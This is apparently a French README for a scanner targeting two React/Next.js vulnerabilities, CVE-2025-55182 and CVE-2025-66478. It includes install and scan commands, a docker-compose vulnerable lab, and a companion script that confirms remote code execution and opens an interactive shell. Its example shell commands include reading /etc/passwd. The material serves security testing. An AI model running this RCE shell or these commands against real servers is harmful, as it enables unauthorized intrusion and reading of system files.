
CVE-2025-55182 and CVE-2025-66478
Scanneur CLI sûr pour CVE-2025-55182 et CVE-2025-66478
Cet outil fournit un scanneur de vulnérabilités léger et non-exploitatif, ciblant les piles JavaScript modernes, notamment :
Il fonctionne sur :
✅ Windows
✅ Linux
✅ macOS
| Fichier | Description |
|---|---|
react_nextjs_scanner.py | Script scanneur principal (Python 3.x, multiplateforme) |
requirements.txt | Dépendances pour l'installation |
README.md | Documentation du projet |
Créez un environnement virtuel :
python3 -m venv .venv
source .venv/bin/activate # Sur Windows : .venv\Scripts\activate
Installez les dépendances :
pip install -r requirements.txt
python3 react_nextjs_scanner.py http://127.0.0.1:3000 python3 react_nextjs_scanner.py -f targets.txt --insecure
À des fins éducatives et de test en laboratoire, utilisez react_nextjs_shell.py pour démontrer une exécution de code à distance (RCE) si un point d'accès vulnérable est détecté.
Remarque : Cet outil effectue d'abord un scan (en utilisant la logique du scanneur) et, si une vulnérabilité RCE spécifique au lab est confirmée, il ouvre un shell interactif.
Utilisation :
python3 react_nextjs_shell.py http://127.0.0.1:8080
# Ou pour sauter la phase de scan :
python3 react_nextjs_shell.py http://127.0.0.1:8080 --skip-scan
Une fois le shell ouvert (Shell>), vous pouvez exécuter des commandes système comme :
idwhoamils -lacat /etc/passwdUn fichier docker-compose.yml est fourni pour configurer facilement un environnement de laboratoire vulnérable local.
Démarrez l'environnement :
docker-compose up --build -d
Cela démarrera :
Exécutez le scanneur/shell :
# Ciblez le backend local
python3 react_nextjs_shell.py http://localhost:8080
Arrêtez l'environnement :
docker-compose down
FurkanKAYAPINAR